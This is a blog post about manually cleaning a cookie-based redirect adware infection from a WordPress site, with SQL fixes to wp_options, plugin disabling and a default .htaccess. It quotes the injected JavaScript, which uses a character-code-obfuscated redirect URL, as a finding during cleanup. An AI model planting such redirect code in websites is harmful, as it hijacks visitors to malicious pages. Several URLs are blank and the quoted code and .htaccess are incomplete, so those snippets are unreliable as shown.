Manually Cleaning Malware from WordPress Website

Recently, my website was hacked & infected by a malware/adware. It took me some time to fix the problem.

Symptoms of the Malware/Adware

Here are a few obvious symptoms of the malware/adware:

  • The main page was redirecting to different websites;
  • The WordPress admin (wp-admin) page cannot be connected (the error message was ERR_TOO_MANY_REDIRECTS).

There were some more symptoms. I checked the source of the infected page (using as an alias, replacing with yours) in your browser:


I found that in many links (especially css files) my webpage were replaced by another website url (

The replaced css links contain malicious code that redirects my webpage to other websites:

var x = getCookie('pp0000011');
if (x) {
	var x2 = getCookie('pp0000012');
    if (x2) {
		var sdfgdfg = "";document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg;
	} else {
		var sdfgdfg = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 108, 105, 99, 107, 46, 110, 101, 119, 112, 117, 115, 104, 46, 115, 117, 112, 112, 111, 114, 116, 47, 101, 115, 117, 122, 110, 120, 105, 102, 113, 107);document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg;
} else {
	var sdfgdfg = "";document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg;

I also checked the database of my website. The siteurl (which should be my website) in the options table was replaced by the malicious website.

SELECT * FROM `YouDatabase`.`wp_options` WHERE `option_name`='siteurl'

Note that the database name was defined in wp-config.php (in the root directory of the wordpress website) containing the following code:

define('DB_NAME', 'YouDatabase');

The options table is named with a ${table_prefix}_options, where ${table_prefix} is defined in wp-config.php as

$table_prefix  = 'wp_';

Steps for Cleaning Malware

Here are the steps used to clean the malware/adware from my website. You need access to your website’s source files and database (e.g., through FTP and phpMyAdmin).

Restore Access to WordPress Admin

Here are a few steps to restore my access to WordPress Admin Page (wp-admin), where the error message was ERR_TOO_MANY_REDIRECTS). It is recommended to backup your website before doing the following steps.

Restore the Homepage in Database

The first step is restore the homepage information in the dababase of website, including updating both siteurl and home:

UPDATE `wp_options` SET `option_value` = '' WHERE `option_name` = 'siteurl';
UPDATE `wp_options` SET `option_value` = '' WHERE `option_name` = 'home';

Disable Plugins

Sometimes the error for logging in could be caused by some plugins, and sometimes the malicious code was hiding in some plugins.

Before disabling all plugins, it is recommended to keep the records of currently active plugins. This value is stored in the option_value column of the row with option_name = 'active_plugins' in the options table:

SELECT * FROM `wp_options` WHERE option_name = 'active_plugins'; 

After that, you can disable all plugins by updating the value representing active plugins with an empty string in database, or renaming the directory /wp-content/plugins.

Using Default .htaccess

The .htaccess file in the root directory of WordPress website might be altered by malware. A simple way is to use default .htaccess for WordPress:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress

After these steps, I regained access to WordPress Admin page.

Further Actions

Upgrade WordPress

The malware/adware could already infect existing WordPress files. In addition, old WordPress versions could have known security holes exploited by malware/adware. Thus a simple way to removing these malicious code is to upgrade WordPress to the newest version.

Deactivate Unused Plugins

The malware/adware could also be hiding in some plugins. Thus, it is a good way to reduce the vulnerability to be hacked by deactivating any plugins that are not really used.

Posted on: Mar 10, 2019

Category : Blog

Leave a Reply